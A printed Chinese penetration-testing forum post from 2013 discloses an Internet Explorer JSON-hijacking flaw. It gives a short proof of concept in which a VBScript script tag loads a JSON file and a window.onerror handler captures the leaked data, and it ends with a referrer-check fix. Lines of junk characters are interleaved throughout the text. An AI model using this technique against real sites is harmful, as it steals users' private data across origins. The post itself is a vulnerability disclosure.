中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
2 N) A8 {5 c) \7 ~
d1 R* l: g3 ?& ?% e/ W
由于某些资源容器对数据处理不当导致json劫持漏洞.
1 [" b q1 E L! F
详细说明:
2 ^4 O. f ^- o, \9 N+ U: G a
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
$ L+ [/ H2 ]" I( o* s
<script language=vbscript></script>
) P' Q2 a3 c7 K h
$ Y% v4 i, r- Q- U% E7 d( W( c. c7 e
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
; J7 w- D9 t R1 }# v
漏洞证明:
8 t0 J' c+ g. D% B! d) C0 p9 L
<script>
: ?* ~' g6 h& F& b9 q; P4 C
window.onerror=function(_){
0 ?+ R. J! J: F0 u$ O; x* E g
alert(_)
% J/ J6 t+ L3 Z( f0 M
}
) g* Y- k: U2 c4 ~
</script>
' p2 I9 Y- l0 l. r
<script language=vbscript src=1.json></script>
) y6 e( i, H: ^: T9 Q
; f: ?/ Z' Q& Z* F l& r, p) S
# o* e6 c: S1 b$ Y6 R( j* l# c
1.json:
S7 Z+ M& v ~- ]* X
[{"name":"sogili","age":19}]
" T9 h" R1 r& I
修复方案:
" f* h; R( M! i- R
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2